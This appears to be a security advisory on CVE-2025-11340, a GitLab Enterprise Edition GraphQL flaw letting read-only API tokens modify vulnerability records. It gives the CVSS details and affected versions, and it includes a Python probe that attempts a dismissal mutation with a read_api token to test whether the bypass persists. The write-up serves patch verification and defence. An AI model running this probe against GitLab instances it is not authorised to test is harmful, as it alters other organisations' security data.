Introduction
Unauthorized modification of vulnerability records in GitLab Enterprise Edition can disrupt security workflows and compliance reporting. CVE-2025-11340 demonstrates how a flaw in GraphQL API authorization allowed authenticated users with read-only API tokens to perform write operations on critical security data, impacting organizations relying on GitLab for vulnerability management.
GitLab is a widely adopted DevOps platform used by enterprises and open-source communities worldwide. It provides source code management, CI/CD, and integrated security features for millions of users. The Enterprise Edition (EE) is the premium offering, including advanced security and compliance tools.
Technical Information
CVE-2025-11340 is classified as CWE-863 (Incorrect Authorization). The vulnerability is present in the GraphQL API of GitLab EE, specifically in the mutation logic that handles vulnerability records. The intended design is that API tokens with the read_api scope are restricted to read-only operations, while tokens with the broader api scope can perform both read and write actions.
Because certain GraphQL mutations were not correctly scoped, a user authenticated with a read_api token could invoke write operations on vulnerability records. This bypassed the expected permission model and amounted to a privilege escalation from read-only to write access on that data. The vulnerability affects the integrity of vulnerability data but does not impact confidentiality or availability. The CVSS v3.1 vector is:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N
This means:
- Network exploitable
- Low attack complexity
- Requires low privileges (an authenticated user holding a read_api-scoped token)
- No user interaction needed
- Changed scope (impacts resources outside the vulnerable component's security boundary)
- High integrity impact
- No confidentiality or availability impact
The root cause is insufficient permission checks on the GraphQL mutations related to vulnerability management: the token scope was not enforced on the write path. No public exploit code or proof of concept has been released. The flaw was discovered internally by a GitLab engineer, not through exploitation in the wild.
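A practitioner patching this issue will want a check that the scope boundary actually holds again. The script below is an added example, not GitLab's code and not a public proof of concept: it sends one write mutation against a vulnerability record using a read_api-scoped token and reports whether the instance refused it. It assumes the GraphQL endpoint at /api/v4/graphql with a Bearer token header, and it uses vulnerabilityDismiss as the representative write (the mutation name, its input shape and the response formats are assumptions; substitute whichever vulnerability mutation your instance exposes). The sample responses embedded for offline exercise are constructed, not captured from a live system.

```python
"""Probe whether a read_api token can still write to a vulnerability record.

Added example, not GitLab code. Assumptions: GraphQL at /api/v4/graphql,
Bearer token auth, and vulnerabilityDismiss as the representative write.
"""
import json
import os
import sys
import urllib.error
import urllib.request

# Representative write against a vulnerability record. Name and input shape are
# assumptions; run it only against a throwaway finding in a test project.
DISMISS_MUTATION = """
mutation ScopeProbe($id: VulnerabilityID!) {
  vulnerabilityDismiss(input: { id: $id, comment: "read_api scope probe" }) {
    errors
    vulnerability { id state }
  }
}
"""


def build_request(base_url, token, vulnerability_gid):
    """Build the POST carrying the mutation, authenticated with the given token."""
    body = json.dumps({"query": DISMISS_MUTATION,
                       "variables": {"id": vulnerability_gid}}).encode()
    return urllib.request.Request(
        f"{base_url.rstrip('/')}/api/v4/graphql",
        data=body,
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {token}"},
        method="POST")


def classify(status, body):
    """Map an HTTP status and response body to 'rejected', 'accepted' or
    'inconclusive'. Only an actual state change counts as 'accepted'."""
    if status in (401, 403):
        return "rejected"
    try:
        doc = json.loads(body)
    except ValueError:
        return "inconclusive"
    if not isinstance(doc, dict):
        return "inconclusive"
    if doc.get("errors"):  # top-level GraphQL errors: request refused
        return "rejected"
    payload = (doc.get("data") or {}).get("vulnerabilityDismiss")
    if payload is None:
        return "inconclusive"
    if payload.get("errors"):
        # Mutation-level errors: only an authorization message proves rejection;
        # anything else (e.g. record not found) says nothing about the scope.
        msgs = " ".join(str(e) for e in payload["errors"]).lower()
        return "rejected" if ("permission" in msgs or "authoriz" in msgs) else "inconclusive"
    if (payload.get("vulnerability") or {}).get("state") == "DISMISSED":
        return "accepted"
    return "inconclusive"


def probe(base_url, token, vulnerability_gid):
    """Send the mutation and classify the outcome (urllib raises on 4xx)."""
    req = build_request(base_url, token, vulnerability_gid)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return classify(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode())


# Constructed sample responses for offline exercise; not captured from GitLab.
SAMPLE_REJECTED = (401, '{"message":"401 Unauthorized"}')
SAMPLE_ACCEPTED = (200, json.dumps({"data": {"vulnerabilityDismiss": {
    "errors": [],
    "vulnerability": {"id": "gid://gitlab/Vulnerability/1", "state": "DISMISSED"}}}}))

if __name__ == "__main__":
    if len(sys.argv) != 3 or "GITLAB_READ_API_TOKEN" not in os.environ:
        sys.exit("usage: GITLAB_READ_API_TOKEN=... probe.py <base_url> <vulnerability_gid>")
    result = probe(sys.argv[1], os.environ["GITLAB_READ_API_TOKEN"], sys.argv[2])
    print(f"read_api write probe: {result}")
    sys.exit(1 if result == "accepted" else 0)
```

Run it with a token that carries only the read_api scope against a finding you are prepared to revert (a dismissal can be undone with the instance's revert-to-detected mutation). An "accepted" result means the boundary is still broken; "inconclusive" usually means the finding ID or mutation name does not match your instance and the probe should be adjusted before drawing any conclusion.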
Affected Systems and Versions
- Product: GitLab Enterprise Edition (EE) only
- Affected versions:
  - 18.3 through 18.3.4
  - 18.4 through 18.4.2
- The GraphQL endpoint is part of GitLab's standard API surface, so the practical precondition is that an attacker holds a read_api-scoped token for an affected instance. Such tokens are commonly issued to CI jobs, dashboards and reporting integrations precisely because they are assumed to be harmless, which is what makes this scope bypass significant.
- Community Edition (CE) is not affected.
Vendor Security History
GitLab regularly releases security updates and maintains a public bug bounty program. Recent security advisories have addressed multiple authorization and GraphQL-related vulnerabilities, including:
- CVE-2025-10004 (GraphQL API denial of service)
- CVE-2025-9825 (GraphQL API missing authorization for CI/CD jobs)
- CVE-2025-11042, CVE-2025-10867 (GraphQL API denial of service)
The vendor typically releases patches promptly and provides detailed advisories. Authorization logic in complex API features, and the GraphQL layer in particular, has been a recurring source of issues, but GitLab's disclosure and response process is transparent and mature.